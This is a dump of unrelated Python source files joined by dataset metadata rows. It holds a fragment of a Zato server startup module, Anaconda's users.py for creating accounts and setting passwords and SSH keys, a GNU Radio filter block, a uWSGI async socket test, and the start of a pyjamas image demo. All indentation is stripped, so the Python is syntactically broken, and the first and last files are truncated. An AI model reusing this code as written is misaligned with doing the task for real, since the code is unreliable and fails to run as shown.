query = self.odb.get_notif_cloud_openstack_swift_list(server.cluster.id, True)
self.config.notif_cloud_openstack_swift = ConfigDict.from_query('notif_cloud_openstack_swift', query)
# SQL
query = self.odb.get_notif_sql_list(server.cluster.id, True)
self.config.notif_sql = ConfigDict.from_query('notif_sql', query)
#
# Notifications - end
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Security - start
#
# API keys
query = self.odb.get_apikey_security_list(server.cluster.id, True)
self.config.apikey = ConfigDict.from_query('apikey', query)
# AWS
query = self.odb.get_aws_security_list(server.cluster.id, True)
self.config.aws = ConfigDict.from_query('aws', query)
# HTTP Basic Auth
query = self.odb.get_basic_auth_list(server.cluster.id, True)
self.config.basic_auth = ConfigDict.from_query('basic_auth', query)
# NTLM
query = self.odb.get_ntlm_list(server.cluster.id, True)
self.config.ntlm = ConfigDict.from_query('ntlm', query)
# OAuth
query = self.odb.get_oauth_list(server.cluster.id, True)
self.config.oauth = ConfigDict.from_query('oauth', query)
# OpenStack
query = self.odb.get_openstack_security_list(server.cluster.id, True)
self.config.openstack_security = ConfigDict.from_query('openstack_security', query)
# RBAC - permissions
query = self.odb.get_rbac_permission_list(server.cluster.id, True)
self.config.rbac_permission = ConfigDict.from_query('rbac_permission', query)
# RBAC - roles
query = self.odb.get_rbac_role_list(server.cluster.id, True)
self.config.rbac_role = ConfigDict.from_query('rbac_role', query)
# RBAC - client roles
query = self.odb.get_rbac_client_role_list(server.cluster.id, True)
self.config.rbac_client_role = ConfigDict.from_query('rbac_client_role', query)
# RBAC - role permission
query = self.odb.get_rbac_role_permission_list(server.cluster.id, True)
self.config.rbac_role_permission = ConfigDict.from_query('rbac_role_permission', query)
# Technical accounts
query = self.odb.get_tech_acc_list(server.cluster.id, True)
self.config.tech_acc = ConfigDict.from_query('tech_acc', query)
# TLS CA certs
query = self.odb.get_tls_ca_cert_list(server.cluster.id, True)
self.config.tls_ca_cert = ConfigDict.from_query('tls_ca_cert', query)
# TLS channel security
query = self.odb.get_tls_channel_sec_list(server.cluster.id, True)
self.config.tls_channel_sec = ConfigDict.from_query('tls_channel_sec', query)
# TLS key/cert pairs
query = self.odb.get_tls_key_cert_list(server.cluster.id, True)
self.config.tls_key_cert = ConfigDict.from_query('tls_key_cert', query)
# WS-Security
query = self.odb.get_wss_list(server.cluster.id, True)
self.config.wss = ConfigDict.from_query('wss', query)
# XPath
query = self.odb.get_xpath_sec_list(server.cluster.id, True)
self.config.xpath_sec = ConfigDict.from_query('xpath_sec', query)
#
# Security - end
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# All the HTTP/SOAP channels.
http_soap = []
for item in self.odb.get_http_soap_list(server.cluster.id, 'channel'):
hs_item = Bunch()
for key in item.keys():
hs_item[key] = getattr(item, key)
hs_item.replace_patterns_json_pointer = item.replace_patterns_json_pointer
hs_item.replace_patterns_xpath = item.replace_patterns_xpath
hs_item.match_target = '{}{}{}'.format(hs_item.soap_action, MISC.SEPARATOR, hs_item.url_path)
hs_item.match_target_compiled = parse_compile(hs_item.match_target)
http_soap.append(hs_item)
self.config.http_soap = http_soap
# Namespaces
query = self.odb.get_namespace_list(server.cluster.id, True)
self.config.msg_ns = ConfigDict.from_query('msg_ns', query)
# XPath
query = self.odb.get_xpath_list(server.cluster.id, True)
self.config.xpath = ConfigDict.from_query('msg_xpath', query)
# JSON Pointer
query = self.odb.get_json_pointer_list(server.cluster.id, True)
self.config.json_pointer = ConfigDict.from_query('json_pointer', query)
# SimpleIO
self.config.simple_io = ConfigDict('simple_io', Bunch())
self.config.simple_io['int_parameters'] = self.int_parameters
self.config.simple_io['int_parameter_suffixes'] = self.int_parameter_suffixes
self.config.simple_io['bool_parameter_prefixes'] = self.bool_parameter_prefixes
# Pub/sub config
self.config.pubsub = Bunch()
self.config.pubsub.default_consumer = Bunch()
self.config.pubsub.default_producer = Bunch()
query = self.odb.get_pubsub_topic_list(server.cluster.id, True)
self.config.pubsub.topics = ConfigDict.from_query('pubsub_topics', query)
id, name = self.odb.get_pubsub_default_client(server.cluster.id, 'zato.pubsub.default-consumer')
self.config.pubsub.default_consumer.id, self.config.pubsub.default_consumer.name = id, name
id, name = self.odb.get_pubsub_default_client(server.cluster.id, 'zato.pubsub.default-producer')
self.config.pubsub.default_producer.id, self.config.pubsub.default_producer.name = id, name
query = self.odb.get_pubsub_producer_list(server.cluster.id, True)
self.config.pubsub.producers = ConfigDict.from_query('pubsub_producers', query, list_config=True)
query = self.odb.get_pubsub_consumer_list(server.cluster.id, True)
self.config.pubsub.consumers = ConfigDict.from_query('pubsub_consumers', query, list_config=True)
# E-mail - SMTP
query = self.odb.get_email_smtp_list(server.cluster.id, True)
self.config.email_smtp = ConfigDict.from_query('email_smtp', query)
# E-mail - IMAP
query = self.odb.get_email_imap_list(server.cluster.id, True)
self.config.email_imap = ConfigDict.from_query('email_imap', query)
# Assign config to worker
self.worker_store.worker_config = self.config
self.worker_store.pubsub = self.pubsub
self.worker_store.init()
if self.singleton_server:
self.singleton_server.wait_for_worker()
# Let's see if we can become a connector server, the one to start all
# the connectors, and start the connectors only once throughout the whole cluster.
self.connector_server_keep_alive_job_time = int(
self.fs_server_config.singleton.connector_server_keep_alive_job_time)
self.connector_server_grace_time = int(
self.fs_server_config.singleton.grace_time_multiplier) * self.connector_server_keep_alive_job_time
if self.singleton_server.become_cluster_wide(
self.connector_server_keep_alive_job_time, self.connector_server_grace_time,
server.id, server.cluster_id, True):
self.init_connectors()
is_singleton = True
# Deploy missing services found on other servers
if locally_deployed:
self.deploy_missing_services(locally_deployed)
# Signal to ODB that we are done with deploying everything
self.odb.on_deployment_finished()
# Default content type
self.json_content_type = self.fs_server_config.content_type.json
self.plain_xml_content_type = self.fs_server_config.content_type.plain_xml
self.soap11_content_type = self.fs_server_config.content_type.soap11
self.soap12_content_type = self.fs_server_config.content_type.soap12
return is_singleton
def init_connectors(self):
""" Starts all the connector subprocesses.
"""
logger.info('Initializing connectors')
# AMQP - channels
channel_amqp_list = self.odb.get_channel_amqp_list(self.cluster_id)
if channel_amqp_list:
for item in channel_amqp_list:
if item.is_active:
amqp_channel_start_connector(self.repo_location, item.id, item.def_id)
else:
logger.info('Not starting an inactive channel (AMQP {})'.format(item.name))
else:
logger.info('No AMQP channels to start')
# AMQP - outgoing
out_amqp_list = self.odb.get_out_amqp_list(self.cluster_id)
if out_amqp_list:
for item in out_amqp_list:
if item.is_active:
amqp_out_start_connector(self.repo_location, item.id, item.def_id)
else:
logger.info('Not starting an inactive outgoing connection (AMQP {})'.format(item.name))
else:
logger.info('No AMQP outgoing connections to start')
# JMS WMQ - channels
channel_jms_wmq_list = self.odb.get_channel_jms_wmq_list(self.cluster_id)
if channel_jms_wmq_list:
for item in channel_jms_wmq_list:
if item.is_active:
jms_wmq_channel_start_connector(self.repo_location, item.id, item.def_id)
else:
logger.info('Not starting an inactive channel (JMS WebSphere MQ {})'.format(item.name))
else:
logger.info('No JMS WebSphere MQ channels to start')
# JMS WMQ - outgoing
out_jms_wmq_list = self.odb.get_out_jms_wmq_list(self.cluster_id)
if out_jms_wmq_list:
for item in out_jms_wmq_list:
if item.is_active:
jms_wmq_out_start_connector(self.repo_location, item.id, item.def_id)
else:
logger.info('Not starting an inactive outgoing connection (JMS WebSphere MQ {})'.format(item.name))
else:
logger.info('No JMS WebSphere MQ outgoing connections to start')
# ZMQ - channels
channel_zmq_list = self.odb.get_channel_zmq_list(self.cluster_id)
if channel_zmq_list:
for item in channel_zmq_list:
if item.is_active:
zmq_channel_start_connector(self.repo_location, item.id)
else:
logger.info('Not starting an inactive channel (ZeroMQ {})'.format(item.name))
else:
logger.info('No Zero MQ channels to start')
def _after_init_non_accepted(self, server):
raise NotImplementedError("This Zato version doesn't support join states other than ACCEPTED")
def get_config_odb_data(self, parallel_server):
""" Returns configuration with regards to ODB data.
"""
odb_data = Bunch()
odb_data.db_name = parallel_server.odb_data['db_name']
odb_data.extra = parallel_server.odb_data['extra']
odb_data.engine = parallel_server.odb_data['engine']
odb_data.token = parallel_server.fs_server_config.main.token
odb_data.is_odb = True
if odb_data.engine != 'sqlite':
odb_data.password = parallel_server.crypto_manager.decrypt(parallel_server.odb_data['password'])
odb_data.host = parallel_server.odb_data['host']
odb_data.port = parallel_server.odb_data['port']
odb_data.engine = parallel_server.odb_data['engine']
odb_data.pool_size = parallel_server.odb_data['pool_size']
odb_data.username = parallel_server.odb_data['username']
# Note that we don't read is_active off of anywhere - ODB always must
# be active and it's not a regular connection pool anyway.
odb_data.is_active = True
return odb_data
def set_odb_pool(self):
# This is the call that creates an SQLAlchemy connection
self.sql_pool_store[ZATO_ODB_POOL_NAME] = self.config.odb_data
self.odb.pool = self.sql_pool_store[ZATO_ODB_POOL_NAME].pool
self.odb.token = self.config.odb_data.token
@staticmethod
def start_server(parallel_server, zato_deployment_key=None):
# Will be set to True if this process is a singleton
is_singleton = False
# Will be None if we are not running in background.
if not zato_deployment_key:
zato_deployment_key = uuid4().hex
register_diag_handlers()
# Store the ODB configuration, create an ODB connection pool and have self.odb use it
parallel_server.config.odb_data = parallel_server.get_config_odb_data(parallel_server)
parallel_server.set_odb_pool()
# Now try grabbing the basic server's data from the ODB. No point
# in doing anything else if we can't get past this point.
server = parallel_server.odb.fetch_server(parallel_server.config.odb_data)
if not server:
raise Exception('Server does not exist in the ODB')
parallel_server.id = server.id
parallel_server.name = server.name
parallel_server.cluster_id = server.cluster_id
is_first, locally_deployed = parallel_server._after_init_common(server, zato_deployment_key)
# For now, all the servers are always ACCEPTED but future versions
# might introduce more join states
if server.last_join_status in(SERVER_JOIN_STATUS.ACCEPTED):
is_singleton = parallel_server._after_init_accepted(server, zato_deployment_key, locally_deployed)
else:
msg = 'Server has not been accepted, last_join_status:[{0}]'
logger.warn(msg.format(server.last_join_status))
parallel_server._after_init_non_accepted(server)
broker_callbacks = {
TOPICS[MESSAGE_TYPE.TO_PARALLEL_ANY]: parallel_server.worker_store.on_broker_msg,
TOPICS[MESSAGE_TYPE.TO_PARALLEL_ALL]: parallel_server.worker_store.on_broker_msg,
}
if is_first:
broker_callbacks[TOPICS[MESSAGE_TYPE.TO_SINGLETON]] = parallel_server.on_broker_msg_singleton
parallel_server.broker_client = BrokerClient(
parallel_server.kvdb, 'parallel', broker_callbacks, parallel_server.get_lua_programs())
parallel_server.worker_store.set_broker_client(parallel_server.broker_client)
if is_first:
kwargs = {'broker_client':parallel_server.broker_client}
Thread(target=parallel_server.singleton_server.run, kwargs=kwargs).start()
parallel_server.odb.server_up_down(server.token, SERVER_UP_STATUS.RUNNING, True,
parallel_server.host, parallel_server.port)
if is_first:
parallel_server.invoke_startup_services(is_first)
# We cannot do it earlier because we need the broker client and everything be ready
if is_singleton:
# Let's wait for the broker client to connect before continuing with anything
while not (parallel_server.singleton_server.broker_client and parallel_server.singleton_server.broker_client.ready):
time.sleep(0.01)
parallel_server.singleton_server.init_scheduler()
parallel_server.singleton_server.init_notifiers()
def invoke_startup_services(self, is_first):
_invoke_startup_services(
'Parallel', 'startup_services_first_worker' if is_first else 'startup_services_any_worker',
self.fs_server_config, self.repo_location, self.broker_client, 'zato.notif.init-notifiers')
@staticmethod
def post_fork(arbiter, worker):
""" A Gunicorn hook which initializes the worker.
"""
ParallelServer.start_server(worker.app.zato_wsgi_app, arbiter.zato_deployment_key)
@staticmethod
def on_starting(arbiter):
""" A Gunicorn hook for setting the deployment key for this particular
set of server processes. It needs to be added to the arbiter because
we want for each worker to be (re-)started to see the same key.
"""
setattr(arbiter, 'zato_deployment_key', uuid4().hex)
def destroy(self):
""" A Spring Python hook for closing down all the resources held.
"""
if self.singleton_server:
# Close all the connector subprocesses this server has possibly started
pairs = ((AMQP_CONNECTOR.CLOSE.value, MESSAGE_TYPE.TO_AMQP_CONNECTOR_ALL),
(JMS_WMQ_CONNECTOR.CLOSE.value, MESSAGE_TYPE.TO_JMS_WMQ_CONNECTOR_ALL),
(ZMQ_CONNECTOR.CLOSE.value, MESSAGE_TYPE.TO_ZMQ_CONNECTOR_ALL),
)
for action, msg_type in pairs:
msg = {}
msg['action'] = action
msg['token'] = self.odb.token
self.broker_client.publish(msg, msg_type=msg_type)
time.sleep(0.2)
# Broker client
self.broker_client.close()
# Scheduler
self.singleton_server.scheduler.stop()
# Pick-up processor
self.singleton_server.pickup.stop()
# Cluster-wide flags
if self.singleton_server.is_cluster_wide:
self.odb.clear_cluster_wide()
# Tell the ODB we've gone through a clean shutdown but only if this is
# the main process going down (Arbiter) not one of Gunicorn workers.
# We know it's the main process because its ODB's session has never
# been initialized.
if not self.odb.session_initialized:
self.config.odb_data = self.get_config_odb_data(self)
self.set_odb_pool()
self.odb.init_session(ZATO_ODB_POOL_NAME, self.config.odb_data, self.odb.pool, False)
self.odb.server_up_down(self.odb.token, SERVER_UP_STATUS.CLEAN_DOWN)
self.odb.close()
# Convenience API
stop = destroy
# ##############################################################################
def on_broker_msg_singleton(self, msg):
getattr(self.singleton_server, 'on_broker_msg_{}'.format(code_to_name[msg.action]))(msg)
# ##############################################################################
def notify_new_package(self, package_id):
""" Publishes a message on the broker so all the servers (this one including
can deploy a new package).
"""
msg = {'action': HOT_DEPLOY.CREATE.value, 'package_id': package_id}
self.broker_client.publish(msg)
| gpl-3.0 | 10,401,790,228,357,972 | 41.168912 | 130 | 0.621483 | false |
jkonecny12/anaconda | pyanaconda/core/users.py | 2 | 17675 | #
# users.py: Code for creating user accounts and setting the root password
#
# Copyright (C) 2006, 2007, 2008 Red Hat, Inc. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Used for ascii_letters and digits constants
import os
import os.path
import subprocess
from contextlib import contextmanager
from pyanaconda.core import util
from pyanaconda.core.configuration.anaconda import conf
from pyanaconda.core.util import strip_accents
from pyanaconda.core.regexes import GROUPLIST_FANCY_PARSE, NAME_VALID, PORTABLE_FS_CHARS, GROUPLIST_SIMPLE_VALID
import crypt
from pyanaconda.core.i18n import _
import re
from pyanaconda.anaconda_loggers import get_module_logger
log = get_module_logger(__name__)
def crypt_password(password):
"""Crypt a password.
Process a password with appropriate salted one-way algorithm.
:param str password: password to be crypted
:returns: crypted representation of the original password
:rtype: str
"""
cryptpw = crypt.crypt(password, crypt.METHOD_SHA512)
if cryptpw is None:
raise RuntimeError(_(
"Unable to encrypt password: unsupported "
"algorithm {}").format(crypt.METHOD_SHA512)
)
return cryptpw
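# Example (editor's note; the salt is random, so the exact hash differs on every call):
#   crypt_password("s3cret")  ->  "$6$<salt>$<hash>"   # a SHA-512 crypt string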
def check_username(name):
"""Check if given username is valid.
:param: user or group name to check
:returns: a (success, translated-error-message) tuple
:rtype: (bool, str or None)
"""
# Check reserved names.
if name in os.listdir("/") + ["root", "home", "daemon", "system"]:
return False, _("User name is reserved for system: %s") % name
return is_valid_name(name)
def check_grouplist(group_list):
"""Check a group list for validity.
:param str group_list: a string representation of a group list to be checked
:returns: a (success, translated-error-message) tuple
:rtype: (bool, str or None)
"""
# Check empty list.
if group_list == "":
return True, None
# Check the group names.
for group_name in group_list.split(","):
valid, message = check_groupname(group_name.strip())
if not valid:
return valid, message
# Check the regexp to be sure
if not GROUPLIST_SIMPLE_VALID.match(group_list):
return False, _("Either a group name in the group list is invalid "
"or groups are not separated by a comma.")
return True, None
def check_groupname(name):
"""Check if group name is valid.
:param: group name to check
:returns: a (success, translated-error-message) tuple
:rtype: (bool, str or None)
"""
return is_valid_name(name)
def is_valid_name(name):
"""Check if given name is valid for either a group or user.
This function checks all the rules that are the same
for both user and group names.
There is a separate check_username() function, which adds some
username-specific checks on top of this.
:param: user or group name to check
:returns: a (success, translated-error-message) tuple
:rtype: (bool, str or None)
"""
# Check shadow-utils rules.
if name.startswith("-"):
return False, _("Name cannot start with '-' character.")
if name in [".", ".."]:
return False, _("Name '%s' is not allowed.") % name
if name.isdigit():
return False, _("Fully numeric name is not allowed.")
# Final '$' allowed for Samba
if name == "$":
return False, _("Name '$' is not allowed.")
if name.endswith("$"):
sname = name[:-1]
else:
sname = name
match = re.search(r'[^' + PORTABLE_FS_CHARS + r']', sname)
if match:
return False, _("Name cannot contain character: '%s'") % match.group()
if len(name) > 32:
return False, _("Name must be shorter than 33 characters.")
# Check also with THE regexp to be sure
if not NAME_VALID.match(name):
return False, _("Name '%s' is invalid.") % name
return True, None
def guess_username(fullname):
"""Guess username from full user name.
:param str fullname: full user name
:returns: guessed, hopefully suitable, username
:rtype: str
"""
fullname = fullname.split()
# use last name word (at the end in most of the western countries..)
if len(fullname) > 0:
username = fullname[-1].lower()
else:
username = u""
# and prefix it with the first name initial
if len(fullname) > 1:
username = fullname[0][0].lower() + username
username = strip_accents(username)
return username
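# Examples (assumed inputs, added for illustration):
#   guess_username("Jane Doe")  -> "jdoe"
#   guess_username("Ångström")  -> "angstrom"   # accents are stripped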
def _getpwnam(user_name, root):
"""Like pwd.getpwnam, but is able to use a different root.
Also just returns the pwd structure as a list, because of laziness.
:param str user_name: user name
:param str root: filesystem root for the operation
"""
with open(root + "/etc/passwd", "r") as f:
for line in f:
fields = line.split(":")
if fields[0] == user_name:
return fields
return None
def _getgrnam(group_name, root):
"""Like grp.getgrnam, but able to use a different root.
Just returns the grp structure as a list, same reason as above.
:param str group_name: group name
:param str root: filesystem root for the operation
"""
with open(root + "/etc/group", "r") as f:
for line in f:
fields = line.split(":")
if fields[0] == group_name:
return fields
return None
def _getgrgid(gid, root):
"""Like grp.getgrgid, but able to use a different root.
Just returns the fields as a list of strings.
:param int gid: group id
:param str root: filesystem root for the operation
"""
# Convert the probably-int GID to a string
gid = str(gid)
with open(root + "/etc/group", "r") as f:
for line in f:
fields = line.split(":")
if fields[2] == gid:
return fields
return None
@contextmanager
def _ensure_login_defs(root):
"""Ensure /etc/login.defs exists in the chroot while the wrapped command runs.
The groupadd and useradd utilities need login.defs to exist in the chroot,
and for a cloud image install or some kind of --nocore install it may not.
An empty file is fine. If it is missing, create it, let the caller run its
command, then clean it up afterwards.
:param str root: filesystem root for the operation
"""
login_defs_path = root + '/etc/login.defs'
if not os.path.exists(login_defs_path):
open(login_defs_path, "w").close()
login_defs_created = True
else:
login_defs_created = False
yield
if login_defs_created:
os.unlink(login_defs_path)
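# Typical usage (mirrors how create_group() and create_user() below call it):
#   with _ensure_login_defs(root):
#       util.execWithRedirect("groupadd", ["-R", root, group_name])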
def create_group(group_name, gid=None, root=None):
"""Create a new user on the system with the given name.
:param int gid: The GID for the new user. If none is given, the next available one is used.
:param str root: The directory of the system to create the new user in.
homedir will be interpreted relative to this. Defaults
to conf.target.system_root.
"""
if root is None:
root = conf.target.system_root
if _getgrnam(group_name, root):
raise ValueError("Group %s already exists" % group_name)
args = ["-R", root]
if gid is not None:
args.extend(["-g", str(gid)])
args.append(group_name)
with _ensure_login_defs(root):
status = util.execWithRedirect("groupadd", args)
if status == 4:
raise ValueError("GID %s already exists" % gid)
elif status == 9:
raise ValueError("Group %s already exists" % group_name)
elif status != 0:
raise OSError("Unable to create group %s: status=%s" % (group_name, status))
def create_user(username, password=False, is_crypted=False, lock=False,
homedir=None, uid=None, gid=None, groups=None, shell=None, gecos="",
root=None):
"""Create a new user on the system with the given name.
:param str username: The username for the new user to be created.
:param str password: The password. See is_crypted for how this is interpreted.
If the password is "" then the account is created
with a blank password. If None or False the account will
be left in its initial state (locked)
:param bool is_crypted: Is the password already encrypted? Defaults to False.
:param bool lock: Is the new account locked by default?
Defaults to False.
:param str homedir: The home directory for the new user.
Defaults to /home/<name>.
:param int uid: The UID for the new user.
If none is given, the next available one is used.
:param int gid: The GID for the new user.
If none is given, the next available one is used.
:param groups: A list of group names the user should be added to.
Each group name can contain an optional GID in parenthesis,
such as "groupName(5000)".
Defaults to [].
:type groups: list of str
:param str shell: The shell for the new user.
If none is given, the login.defs default is used.
:param str gecos: The GECOS information (full name, office, phone, etc.).
Defaults to "".
:param str root: The directory of the system to create the new user in.
The homedir option will be interpreted relative to this.
Defaults to conf.target.system_root.
"""
# resolve the optional arguments that need a default that can't be
# reasonably set in the function signature
if not homedir:
homedir = "/home/" + username
if groups is None:
groups = []
if root is None:
root = conf.target.system_root
if check_user_exists(username, root):
raise ValueError("User %s already exists" % username)
args = ["-R", root]
# Split the groups argument into a list of (username, gid or None) tuples
# the gid, if any, is a string since that makes things simpler
group_gids = [GROUPLIST_FANCY_PARSE.match(group).groups() for group in groups]
# If a specific gid is requested:
# - check if a group already exists with that GID. i.e., the user's
# GID should refer to a system group, such as users. If so, just set
# the GID.
# - check if a new group is requested with that GID. If so, set the GID
# and let the block below create the actual group.
# - if neither of those are true, create a new user group with the requested
# GID
# otherwise use -U to create a new user group with the next available GID.
if gid:
if not _getgrgid(gid, root) and not any(one_gid[1] == str(gid) for one_gid in group_gids):
create_group(username, gid=gid, root=root)
args.extend(['-g', str(gid)])
else:
args.append('-U')
# If any requested groups do not exist, create them.
group_list = []
for group_name, gid in group_gids:
existing_group = _getgrnam(group_name, root)
# Check for a bad GID request
if gid and existing_group and gid != existing_group[2]:
raise ValueError("Group %s already exists with GID %s" % (group_name, gid))
# Otherwise, create the group if it does not already exist
if not existing_group:
create_group(group_name, gid=gid, root=root)
group_list.append(group_name)
if group_list:
args.extend(['-G', ",".join(group_list)])
# useradd expects the parent directory tree to exist.
parent_dir = util.parent_dir(root + homedir)
# If root + homedir came out to "/", such as if we're creating the sshpw user,
# parent_dir will be empty. Don't create that.
if parent_dir:
util.mkdirChain(parent_dir)
args.extend(["-d", homedir])
# Check whether the directory exists or if useradd should create it
mk_homedir = not os.path.exists(root + homedir)
if mk_homedir:
args.append("-m")
else:
args.append("-M")
if shell:
args.extend(["-s", shell])
if uid:
args.extend(["-u", str(uid)])
if gecos:
args.extend(["-c", gecos])
args.append(username)
with _ensure_login_defs(root):
status = util.execWithRedirect("useradd", args)
if status == 4:
raise ValueError("UID %s already exists" % uid)
elif status == 6:
raise ValueError("Invalid groups %s" % groups)
elif status == 9:
raise ValueError("User %s already exists" % username)
elif status != 0:
raise OSError("Unable to create user %s: status=%s" % (username, status))
if not mk_homedir:
try:
stats = os.stat(root + homedir)
orig_uid = stats.st_uid
orig_gid = stats.st_gid
# Get the UID and GID of the created user
pwent = _getpwnam(username, root)
log.info("Home directory for the user %s already existed, "
"fixing the owner and SELinux context.", username)
# home directory already existed, change owner of it properly
util.chown_dir_tree(root + homedir,
int(pwent[2]), int(pwent[3]),
orig_uid, orig_gid)
util.execWithRedirect("restorecon", ["-r", root + homedir])
except OSError as e:
log.critical("Unable to change owner of existing home directory: %s", e.strerror)
raise
set_user_password(username, password, is_crypted, lock, root)
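# Example invocation (hypothetical values; see the docstring above for the full rules):
#   create_user("jdoe", password="s3cret", gecos="Jane Doe",
#               groups=["wheel"], root="/mnt/sysimage")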
def check_user_exists(username, root=None):
"""Check a user exists.
:param str username: username to check
:param str root: target system sysroot path
"""
if root is None:
root = conf.target.system_root
if _getpwnam(username, root):
return True
return False
def set_user_password(username, password, is_crypted, lock, root="/"):
"""Set user password.
:param str username: username of the user
:param str password: user password
:param bool is_crypted: is the password already crypted ?
:param bool lock: should the password for this username be locked ?
:param str root: target system sysroot path
"""
# Only set the password if it is a string, including the empty string.
# Otherwise leave it alone (defaults to locked for new users) and reset sp_lstchg
if password or password == "":
if password == "":
log.info("user account %s setup with no password", username)
elif not is_crypted:
password = crypt_password(password)
if lock:
password = "!" + password
log.info("user account %s locked", username)
proc = util.startProgram(["chpasswd", "-R", root, "-e"], stdin=subprocess.PIPE)
proc.communicate(("%s:%s\n" % (username, password)).encode("utf-8"))
if proc.returncode != 0:
raise OSError("Unable to set password for new user: status=%s" % proc.returncode)
# Reset sp_lstchg to an empty string. On systems with no rtc, this
# field can be set to 0, which has a special meaning that the password
# must be reset on the next login.
util.execWithRedirect("chage", ["-R", root, "-d", "", username])
def set_root_password(password, is_crypted=False, lock=False, root="/"):
"""Set root password.
:param str password: root password
:param bool is_crypted: is the password already crypted ?
:param bool lock: should the root password be locked ?
:param str root: target system sysroot path
"""
return set_user_password("root", password, is_crypted, lock, root)
def set_user_ssh_key(username, key, root=None):
"""Set an SSH key for a given username.
:param str username: a username
:param str key: the SSH key to set
:param str root: target system sysroot path
"""
if root is None:
root = conf.target.system_root
pwent = _getpwnam(username, root)
if not pwent:
raise ValueError("set_user_ssh_key: user %s does not exist" % username)
homedir = root + pwent[5]
if not os.path.exists(homedir):
log.error("set_user_ssh_key: home directory for %s does not exist", username)
raise ValueError("set_user_ssh_key: home directory for %s does not exist" % username)
uid = pwent[2]
gid = pwent[3]
sshdir = os.path.join(homedir, ".ssh")
if not os.path.isdir(sshdir):
os.mkdir(sshdir, 0o700)
os.chown(sshdir, int(uid), int(gid))
authfile = os.path.join(sshdir, "authorized_keys")
authfile_existed = os.path.exists(authfile)
with util.open_with_perm(authfile, "a", 0o600) as f:
f.write(key + "\n")
# Only change ownership if we created it
if not authfile_existed:
os.chown(authfile, int(uid), int(gid))
util.execWithRedirect("restorecon", ["-r", sshdir])
| gpl-2.0 | 4,420,711,798,531,218,000 | 32.412098 | 112 | 0.628006 | false |
jasimpson/gnuradio-jasimpson | gnuradio-core/src/python/gnuradio/blks2impl/pfb_interpolator.py | 10 | 2640 | #!/usr/bin/env python
#
# Copyright 2009 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, optfir
class pfb_interpolator_ccf(gr.hier_block2):
'''
Make a Polyphase Filter interpolator (complex in, complex out, floating-point taps)
The block takes a single complex stream in and outputs a single complex
stream out. As such, it requires no extra glue to handle the input/output
streams. This block is provided to be consistent with the interface to the
other PFB block.
'''
def __init__(self, interp, taps=None, atten=100):
gr.hier_block2.__init__(self, "pfb_interpolator_ccf",
gr.io_signature(1, 1, gr.sizeof_gr_complex), # Input signature
gr.io_signature(1, 1, gr.sizeof_gr_complex)) # Output signature
self._interp = interp
if taps is not None:
self._taps = taps
else:
# Create a filter that covers the full bandwidth of the input signal
bw = 0.4
tb = 0.2
ripple = 0.99
made = False
while not made:
try:
self._taps = optfir.low_pass(self._interp, self._interp, bw, bw+tb, ripple, atten)
made = True
except RuntimeError:
ripple += 0.01
made = False
print("Warning: set ripple to %.4f dB. If this is a problem, adjust the attenuation or create your own filter taps." % (ripple))
# Build in an exit strategy; if we've come this far, it ain't working.
if(ripple >= 1.0):
raise RuntimeError("optfir could not generate an appropriate filter.")
self.pfb = gr.pfb_interpolator_ccf(self._interp, self._taps)
self.connect(self, self.pfb)
self.connect(self.pfb, self)
| gpl-3.0 | -436,305,110,298,403,840 | 36.714286 | 148 | 0.624621 | false |
tachang/uwsgi | tests/iobound_async_unix.py | 13 | 1085 | import socket
import select
import errno
import struct
def send_request(env, client):
client.setblocking(1)
data = "hello world\r\n"
# send uwsgi-echo header
client.send(struct.pack('<BHB', 101, len(data), 0))
# send body
client.send(data)
while 1:
yield env['x-wsgiorg.fdevent.readable'](client.fileno(), 10)
buf = client.recv(4096)
if len(buf) == 0:
break
else:
yield buf
def application(env, start_response):
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.setblocking(0)
#env['x-wsgiorg.fdevent.readable'] = lambda fd,t: ""
#env['x-wsgiorg.fdevent.writable'] = lambda fd,t: ""
#yield ""
c = s.connect_ex('echo.sock')
if c == errno.EINPROGRESS:
yield env['x-wsgiorg.fdevent.writable'](s.fileno(), 10)
for r in send_request(env, s):
yield r
elif c == errno.EISCONN or c == 0:
start_response('200 Ok', [ ('Content-Type', 'text/plain')])
for r in send_request(env, s):
yield r
else:
        print(c)
start_response( '500 Internal Server Error', [ ('Content-Type', 'text/plain')])
yield "Internal Server Error"
s.close()
| gpl-2.0 | -8,210,998,493,778,553,000 | 20.27451 | 81 | 0.661751 | false |
jaredly/pyjamas | examples/showcase/src/demos_widgets/image.py | 13 | 1339 | """
The ``ui.Image`` class is used to display an image.
The ``Image`` class can display any image that is specified by a URL. This can
be an image stored somewhere on the internet, or alternatively you can store an
image in the "public" directory within your application's source folder, and
then access it using a relative URL, as shown below.
In this example, the image file named "myImage.jpg" is stored inside the
"images" sub-directory, which is in the "public" directory within the
application's main source directory.
As well as passing the image URL to the initialiser, you can call ``setURL()``
to change the image being displayed at any time. You can also call
``addClickListener()`` to add a listener function to be called when the user
clicks on the image.
"""
from pyjamas.ui.SimplePanel import SimplePanel
from pyjamas.ui.Image import Image
from pyjamas import Window
class ImageDemo(SimplePanel):
def __init__(self):
SimplePanel.__init__(self)
